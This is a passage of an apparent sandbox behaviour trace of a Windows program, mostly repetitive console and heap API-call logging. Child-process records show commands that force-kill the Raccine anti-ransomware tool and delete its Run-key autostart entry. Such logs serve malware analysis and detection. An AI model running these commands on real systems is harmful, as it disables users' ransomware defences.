| out: lpConsoleScreenBufferInfo=0x5dceb08) returned 1 [0079.134] GetLastError () returned 0x0 [0079.134] GetConsoleOutputCP () returned 0x1b5 [0079.134] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0079.134] GetLastError () returned 0x0 [0079.138] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x57 [0079.151] GetLastError () returned 0x0 [0079.151] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x57, lpConsoleScreenBufferInfo=0x5dceaa8 | out: lpConsoleScreenBufferInfo=0x5dceaa8) returned 1 [0079.151] GetLastError () returned 0x0 [0079.155] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b [0079.156] GetLastError () returned 0x0 [0079.156] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5b, lpConsoleScreenBufferInfo=0x5dceaa8 | out: lpConsoleScreenBufferInfo=0x5dceaa8) returned 1 [0079.156] GetLastError () returned 0x0 [0079.160] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f [0079.160] GetLastError () returned 0x0 [0079.160] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5f, lpConsoleScreenBufferInfo=0x5dceab0 | out: lpConsoleScreenBufferInfo=0x5dceab0) returned 1 [0079.161] GetLastError () returned 0x0 [0079.161] SetConsoleTextAttribute (hConsoleOutput=0x5f, wAttributes=0xc) returned 1 [0079.161] GetLastError () returned 0x0 [0079.161] CloseHandle (hObject=0x5f) returned 1 [0079.161] GetLastError () returned 0x0 [0079.165] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f [0079.165] GetLastError () returned 0x0 [0079.165] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5f, lpConsoleScreenBufferInfo=0x5dceab0 | out: lpConsoleScreenBufferInfo=0x5dceab0) returned 1 [0079.166] GetLastError () returned 0x0 [0079.166] SetConsoleTextAttribute (hConsoleOutput=0x5f, wAttributes=0xc) returned 1 [0079.166] GetLastError () returned 0x0 [0079.166] CloseHandle (hObject=0x5f) returned 1 [0079.166] GetLastError () returned 0x0 [0079.166] WriteFile (in: hFile=0x2b0, lpBuffer=0x2d0eee4*, nNumberOfBytesToWrite=0x4f, lpNumberOfBytesWritten=0x5dceab4, lpOverlapped=0x0 | out: lpBuffer=0x2d0eee4*, lpNumberOfBytesWritten=0x5dceab4*=0x4f, lpOverlapped=0x0) returned 1 [0079.166] GetLastError () returned 0x0 [0079.171] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f [0079.171] GetLastError () returned 0x0 [0079.171] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5f, lpConsoleScreenBufferInfo=0x5dceaac | out: lpConsoleScreenBufferInfo=0x5dceaac) returned 1 [0079.171] GetLastError () returned 0x0 [0079.171] SetConsoleTextAttribute (hConsoleOutput=0x5f, wAttributes=0x7) returned 1 [0079.171] GetLastError () returned 0x0 [0079.172] CloseHandle (hObject=0x5f) returned 1 [0079.172] GetLastError () returned 0x0 [0079.176] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f [0079.176] GetLastError () returned 0x0 [0079.176] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5f, lpConsoleScreenBufferInfo=0x5dceaac | out: lpConsoleScreenBufferInfo=0x5dceaac) returned 1 [0079.176] GetLastError () returned 0x0 [0079.176] SetConsoleTextAttribute (hConsoleOutput=0x5f, wAttributes=0x7) returned 1 [0079.176] GetLastError () returned 0x0 [0079.176] CloseHandle (hObject=0x5f) returned 1 [0079.177] GetLastError () returned 0x0 [0079.177] WriteFile (in: hFile=0x2b0, lpBuffer=0x2d0eee4*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x5dceaf4, lpOverlapped=0x0 | out: lpBuffer=0x2d0eee4*, lpNumberOfBytesWritten=0x5dceaf4*=0x1, lpOverlapped=0x0) returned 1 [0079.177] GetLastError () returned 0x0 [0079.181] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f [0079.181] GetLastError () returned 0x0 [0079.181] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5f, lpConsoleScreenBufferInfo=0x5dceb08 | out: lpConsoleScreenBufferInfo=0x5dceb08) returned 1 [0079.182] GetLastError () returned 0x0 [0079.182] GetConsoleOutputCP () returned 0x1b5 [0079.182] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0079.182] GetLastError () returned 0x0 [0079.185] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x63 [0079.186] GetLastError () returned 0x0 [0079.186] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x63, lpConsoleScreenBufferInfo=0x5dceaa8 | out: lpConsoleScreenBufferInfo=0x5dceaa8) returned 1 [0079.186] GetLastError () returned 0x0 [0079.190] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x67 [0079.190] GetLastError () returned 0x0 [0079.190] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x67, lpConsoleScreenBufferInfo=0x5dceaa8 | out: lpConsoleScreenBufferInfo=0x5dceaa8) returned 1 [0079.190] GetLastError () returned 0x0 [0079.194] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6b [0079.194] GetLastError () returned 0x0 [0079.194] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x6b, lpConsoleScreenBufferInfo=0x5dceab0 | out: lpConsoleScreenBufferInfo=0x5dceab0) returned 1 [0079.194] GetLastError () returned 0x0 [0079.194] SetConsoleTextAttribute (hConsoleOutput=0x6b, wAttributes=0xc) returned 1 [0079.195] GetLastError () returned 0x0 [0079.195] CloseHandle (hObject=0x6b) returned 1 [0079.195] GetLastError () returned 0x0 [0079.199] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6b [0079.199] GetLastError () returned 0x0 [0079.199] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x6b, lpConsoleScreenBufferInfo=0x5dceab0 | out: lpConsoleScreenBufferInfo=0x5dceab0) returned 1 [0079.200] GetLastError () returned 0x0 [0079.200] SetConsoleTextAttribute (hConsoleOutput=0x6b, wAttributes=0xc) returned 1 [0079.200] GetLastError () returned 0x0 [0079.200] CloseHandle (hObject=0x6b) returned 1 [0079.200] GetLastError () returned 0x0 [0079.200] WriteFile (in: hFile=0x2b0, lpBuffer=0x2d0eee4*, nNumberOfBytesToWrite=0x19, lpNumberOfBytesWritten=0x5dceab4, lpOverlapped=0x0 | out: lpBuffer=0x2d0eee4*, lpNumberOfBytesWritten=0x5dceab4*=0x19, lpOverlapped=0x0) returned 1 [0079.201] GetLastError () returned 0x0 [0079.204] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6b [0079.204] GetLastError () returned 0x0 [0079.204] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x6b, lpConsoleScreenBufferInfo=0x5dceaac | out: lpConsoleScreenBufferInfo=0x5dceaac) returned 1 [0079.205] GetLastError () returned 0x0 [0079.205] SetConsoleTextAttribute (hConsoleOutput=0x6b, wAttributes=0x7) returned 1 [0079.205] GetLastError () returned 0x0 [0079.205] CloseHandle (hObject=0x6b) returned 1 [0079.205] GetLastError () returned 0x0 [0079.209] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6b [0079.209] GetLastError () returned 0x0 [0079.210] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x6b, lpConsoleScreenBufferInfo=0x5dceaac | out: lpConsoleScreenBufferInfo=0x5dceaac) returned 1 [0079.210] GetLastError () returned 0x0 [0079.210] SetConsoleTextAttribute (hConsoleOutput=0x6b, wAttributes=0x7) returned 1 [0079.210] GetLastError () returned 0x0 [0079.210] CloseHandle (hObject=0x6b) returned 1 [0079.210] GetLastError () returned 0x0 [0079.210] WriteFile (in: hFile=0x2b0, lpBuffer=0x2d0eee4*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x5dceaf4, lpOverlapped=0x0 | out: lpBuffer=0x2d0eee4*, lpNumberOfBytesWritten=0x5dceaf4*=0x1, lpOverlapped=0x0) returned 1 [0079.211] GetLastError () returned 0x0 [0079.214] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6b [0079.215] GetLastError () returned 0x0 [0079.215] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x6b, lpConsoleScreenBufferInfo=0x5dceb08 | out: lpConsoleScreenBufferInfo=0x5dceb08) returned 1 [0079.215] GetLastError () returned 0x0 [0079.215] GetConsoleOutputCP () returned 0x1b5 [0079.215] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0079.215] GetLastError () returned 0x0 [0079.219] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6f [0079.220] GetLastError () returned 0x0 [0079.220] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x6f, lpConsoleScreenBufferInfo=0x5dceaa8 | out: lpConsoleScreenBufferInfo=0x5dceaa8) returned 1 [0079.220] GetLastError () returned 0x0 [0079.224] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x73 [0079.224] GetLastError () returned 0x0 [0079.224] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x73, lpConsoleScreenBufferInfo=0x5dceaa8 | out: lpConsoleScreenBufferInfo=0x5dceaa8) returned 1 [0079.224] GetLastError () returned 0x0 [0079.228] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x77 [0079.228] GetLastError () returned 0x0 [0079.228] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x77, lpConsoleScreenBufferInfo=0x5dceab0 | out: lpConsoleScreenBufferInfo=0x5dceab0) returned 1 [0079.229] GetLastError () returned 0x0 [0079.229] SetConsoleTextAttribute (hConsoleOutput=0x77, wAttributes=0xc) returned 1 [0079.229] GetLastError () returned 0x0 [0079.229] CloseHandle (hObject=0x77) returned 1 [0079.229] GetLastError () returned 0x0 [0079.233] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x77 [0079.233] GetLastError () returned 0x0 [0079.233] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x77, lpConsoleScreenBufferInfo=0x5dceab0 | out: lpConsoleScreenBufferInfo=0x5dceab0) returned 1 [0079.233] GetLastError () returned 0x0 [0079.233] SetConsoleTextAttribute (hConsoleOutput=0x77, wAttributes=0xc) returned 1 [0079.233] GetLastError () returned 0x0 [0079.234] CloseHandle (hObject=0x77) returned 1 [0079.234] GetLastError () returned 0x0 [0079.234] WriteFile (in: hFile=0x2b0, lpBuffer=0x2d0eee4*, nNumberOfBytesToWrite=0x36, lpNumberOfBytesWritten=0x5dceab4, lpOverlapped=0x0 | out: lpBuffer=0x2d0eee4*, lpNumberOfBytesWritten=0x5dceab4*=0x36, lpOverlapped=0x0) returned 1 [0079.234] GetLastError () returned 0x0 [0079.238] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x77 [0079.238] GetLastError () returned 0x0 [0079.238] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x77, lpConsoleScreenBufferInfo=0x5dceaac | out: lpConsoleScreenBufferInfo=0x5dceaac) returned 1 [0079.238] GetLastError () returned 0x0 [0079.238] SetConsoleTextAttribute (hConsoleOutput=0x77, wAttributes=0x7) returned 1 [0079.239] GetLastError () returned 0x0 [0079.239] CloseHandle (hObject=0x77) returned 1 [0079.239] GetLastError () returned 0x0 [0079.243] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x77 [0079.243] GetLastError () returned 0x0 [0079.243] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x77, lpConsoleScreenBufferInfo=0x5dceaac | out: lpConsoleScreenBufferInfo=0x5dceaac) returned 1 [0079.243] GetLastError () returned 0x0 [0079.243] SetConsoleTextAttribute (hConsoleOutput=0x77, wAttributes=0x7) returned 1 [0079.243] GetLastError () returned 0x0 [0079.244] CloseHandle (hObject=0x77) returned 1 [0079.244] GetLastError () returned 0x0 [0079.244] WriteFile (in: hFile=0x2b0, lpBuffer=0x2d0eee4*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x5dceaf4, lpOverlapped=0x0 | out: lpBuffer=0x2d0eee4*, lpNumberOfBytesWritten=0x5dceaf4*=0x1, lpOverlapped=0x0) returned 1 [0079.244] GetLastError () returned 0x0 [0079.248] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x77 [0079.255] GetLastError () returned 0x0 [0079.255] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x77, lpConsoleScreenBufferInfo=0x5dceb08 | out: lpConsoleScreenBufferInfo=0x5dceb08) returned 1 [0079.255] GetLastError () returned 0x0 [0079.255] GetConsoleOutputCP () returned 0x1b5 [0079.255] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0079.255] GetLastError () returned 0x0 [0079.259] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7b [0079.260] GetLastError () returned 0x0 [0079.260] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7b, lpConsoleScreenBufferInfo=0x5dceaa8 | out: lpConsoleScreenBufferInfo=0x5dceaa8) returned 1 [0079.260] GetLastError () returned 0x0 [0079.264] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7f [0079.265] GetLastError () returned 0x0 [0079.265] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7f, lpConsoleScreenBufferInfo=0x5dceaa8 | out: lpConsoleScreenBufferInfo=0x5dceaa8) returned 1 [0079.265] GetLastError () returned 0x0 [0079.271] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x83 [0079.271] GetLastError () returned 0x0 [0079.271] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x83, lpConsoleScreenBufferInfo=0x5dceab0 | out: lpConsoleScreenBufferInfo=0x5dceab0) returned 1 [0079.272] GetLastError () returned 0x0 [0079.272] SetConsoleTextAttribute (hConsoleOutput=0x83, wAttributes=0xc) returned 1 [0079.272] GetLastError () returned 0x0 [0079.272] CloseHandle (hObject=0x83) returned 1 [0079.273] GetLastError () returned 0x0 [0079.277] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x83 [0079.278] GetLastError () returned 0x0 [0079.278] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x83, lpConsoleScreenBufferInfo=0x5dceab0 | out: lpConsoleScreenBufferInfo=0x5dceab0) returned 1 [0079.278] GetLastError () returned 0x0 [0079.278] SetConsoleTextAttribute (hConsoleOutput=0x83, wAttributes=0xc) returned 1 [0079.278] GetLastError () returned 0x0 [0079.279] CloseHandle (hObject=0x83) returned 1 [0079.279] GetLastError () returned 0x0 [0079.279] WriteFile (in: hFile=0x2b0, lpBuffer=0x2d0eee4*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x5dceab4, lpOverlapped=0x0 | out: lpBuffer=0x2d0eee4*, lpNumberOfBytesWritten=0x5dceab4*=0x1, lpOverlapped=0x0) returned 1 [0079.280] GetLastError () returned 0x0 [0079.284] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x83 [0079.284] GetLastError () returned 0x0 [0079.284] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x83, lpConsoleScreenBufferInfo=0x5dceaac | out: lpConsoleScreenBufferInfo=0x5dceaac) returned 1 [0079.285] GetLastError () returned 0x0 [0079.285] SetConsoleTextAttribute (hConsoleOutput=0x83, wAttributes=0x7) returned 1 [0079.285] GetLastError () returned 0x0 [0079.285] CloseHandle (hObject=0x83) returned 1 [0079.285] GetLastError () returned 0x0 [0079.289] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x83 [0079.290] GetLastError () returned 0x0 [0079.290] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x83, lpConsoleScreenBufferInfo=0x5dceaac | out: lpConsoleScreenBufferInfo=0x5dceaac) returned 1 [0079.290] GetLastError () returned 0x0 [0079.290] SetConsoleTextAttribute (hConsoleOutput=0x83, wAttributes=0x7) returned 1 [0079.290] GetLastError () returned 0x0 [0079.290] CloseHandle (hObject=0x83) returned 1 [0079.290] GetLastError () returned 0x0 [0079.291] WriteFile (in: hFile=0x2b0, lpBuffer=0x2d0eee4*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x5dceaf4, lpOverlapped=0x0 | out: lpBuffer=0x2d0eee4*, lpNumberOfBytesWritten=0x5dceaf4*=0x1, lpOverlapped=0x0) returned 1 [0079.291] GetLastError () returned 0x0 [0079.297] SetEvent (hEvent=0x408) returned 1 [0079.297] GetLastError () returned 0x0 [0079.297] SetEvent (hEvent=0x3f8) returned 1 [0079.297] GetLastError () returned 0x0 [0079.297] SetEvent (hEvent=0x3fc) returned 1 [0079.297] GetLastError () returned 0x0 [0079.297] SetEvent (hEvent=0x404) returned 1 [0079.297] GetLastError () returned 0x0 [0079.297] SetEvent (hEvent=0x418) returned 1 [0079.297] GetLastError () returned 0x0 [0079.298] SetEvent (hEvent=0x40c) returned 1 [0079.298] GetLastError () returned 0x0 [0079.298] SetEvent (hEvent=0x410) returned 1 [0079.298] GetLastError () returned 0x0 [0079.298] SetEvent (hEvent=0x414) returned 1 [0079.298] GetLastError () returned 0x0 [0079.298] SetEvent (hEvent=0x41c) returned 1 [0079.298] GetLastError () returned 0x0 [0079.298] CoUninitialize () Thread: id = 76 os_tid = 0x8a4 [0079.318] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0079.319] SetThreadUILanguage (LangId=0x0) returned 0x409 [0079.321] VirtualQuery (in: lpAddress=0x68bdf20, lpBuffer=0x68bef20, dwLength=0x1c | out: lpBuffer=0x68bef20*(BaseAddress=0x68bd000, AllocationBase=0x5f30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0079.321] VirtualQuery (in: lpAddress=0x68be03c, lpBuffer=0x68bf03c, dwLength=0x1c | out: lpBuffer=0x68bf03c*(BaseAddress=0x68be000, AllocationBase=0x5f30000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0079.326] SetEvent (hEvent=0x358) returned 1 [0079.326] GetLastError () returned 0x0 [0079.326] SetEvent (hEvent=0x328) returned 1 [0079.326] GetLastError () returned 0x0 [0079.326] SetEvent (hEvent=0x34c) returned 1 [0079.326] GetLastError () returned 0x0 [0079.326] SetEvent (hEvent=0x358) returned 1 [0079.326] GetLastError () returned 0x0 [0079.326] SetEvent (hEvent=0x328) returned 1 [0079.326] GetLastError () returned 0x0 [0079.326] SetEvent (hEvent=0x368) returned 1 [0079.327] GetLastError () returned 0x0 [0079.327] SetEvent (hEvent=0x35c) returned 1 [0079.327] GetLastError () returned 0x0 [0079.327] SetEvent (hEvent=0x360) returned 1 [0079.327] GetLastError () returned 0x0 [0079.327] SetEvent (hEvent=0x364) returned 1 [0079.327] GetLastError () returned 0x0 [0079.327] SetEvent (hEvent=0x36c) returned 1 [0079.327] GetLastError () returned 0x0 [0079.327] CoUninitialize () Process: id = "5" image_name = "taskkill.exe" filename = "c:\\windows\\syswow64\\taskkill.exe" page_root = "0x79c4000" os_pid = "0x8c4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"taskkill\" /F /IM RaccineSettings.exe" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 77 os_tid = 0x8d4 Thread: id = 120 os_tid = 0x874 Thread: id = 131 os_tid = 0xc1c Thread: id = 135 os_tid = 0xc78 Thread: id = 136 os_tid = 0xc7c Process: id = "6" image_name = "reg.exe" filename = "c:\\windows\\syswow64\\reg.exe" page_root = "0x10ca000" os_pid = "0x8e4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"reg\" delete \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Raccine Tray\" /F" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 78 os_tid = 0x8f4 [0081.583] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x10f9dc | out: lpSystemTimeAsFileTime=0x10f9dc*(dwLowDateTime=0xbb579d0, dwHighDateTime=0x1d6f0d1)) [0081.583] GetCurrentProcessId () returned 0x8e4 [0081.583] GetCurrentThreadId () returned 0x8f4 [0081.583] GetTickCount () returned 0x114ae78 [0081.583] QueryPerformanceCounter (in: lpPerformanceCount=0x10f9d4 | out: lpPerformanceCount=0x10f9d4*=20068366771) returned 1 [0081.585] GetModuleHandleA (lpModuleName=0x0) returned 0xf90000 [0081.585] __set_app_type (_Type=0x1) [0081.585] __p__fmode () returned 0x770331f4 [0081.585] __p__commode () returned 0x770331fc [0081.585] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xf9d4f9) returned 0x0 [0081.585] __wgetmainargs (in: _Argc=0xf9f030, _Argv=0xf9f038, _Env=0xf9f034, _DoWildCard=0, _StartInfo=0xf9f010 | out: _Argc=0xf9f030, _Argv=0xf9f038, _Env=0xf9f034) returned 0 [0081.585] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="delete", cchCount1=-1, lpString2="QUERY", cchCount2=-1) returned 1 [0081.586] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="delete", cchCount1=-1, lpString2="ADD", cchCount2=-1) returned 3 [0081.586] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="delete", cchCount1=-1, lpString2="DELETE", cchCount2=-1) returned 2 [0081.586] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", phkResult=0x10f95c | out: phkResult=0x10f95c*=0x0) returned 0x2 [0081.586] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="delete", cchCount1=-1, lpString2="DELETE", cchCount2=-1) returned 2 [0081.586] lstrlenW (lpString="-?|/?|-h|/h") returned 11 [0081.586] GetProcessHeap () returned 0x490000 [0081.586] RtlAllocateHeap (HeapHandle=0x490000, Flags=0xc, Size=0x10) returned 0x49eeb8 [0081.586] lstrlenW (lpString="") returned 0 [0081.586] GetProcessHeap () returned 0x490000 [0081.586] RtlAllocateHeap (HeapHandle=0x490000, Flags=0xc, Size=0x2) returned 0x4a4ac8 [0081.586] GetProcessHeap () returned 0x490000 [0081.586] RtlAllocateHeap (HeapHandle=0x490000, Flags=0xc, Size=0x14) returned 0x4a4ad8 [0081.587] GetProcessHeap () returned 0x490000 [0081.587] RtlAllocateHeap (HeapHandle=0x490000, Flags=0xc, Size=0x10) returned 0x49eed0 [0081.587] GetProcessHeap () returned 0x490000 [0081.587] RtlAllocateHeap (HeapHandle=0x490000, Flags=0xc, Size=0x14) returned 0x4a4af8 [0081.587] GetProcessHeap () returned 0x490000 [0081.587] RtlAllocateHeap (HeapHandle=0x490000, Flags=0xc, Size=0x14) returned 0x4a4b18 [0081.587] GetProcessHeap () returned 0x490000 [0081.587] RtlAllocateHeap (HeapHandle=0x490000, Flags=0xc, Size=0x14) returned 0x4a4b38 [0081.587] GetProcessHeap () returned 0x490000 [0081.587] RtlAllocateHeap (HeapHandle=0x490000, Flags=0xc, Size=0x14) returned 0x4a4b58 [0081.587] GetProcessHeap () returned 0x490000 [0081.587] RtlAllocateHeap (HeapHandle=0x490000, Flags=0xc, Size=0x10) returned 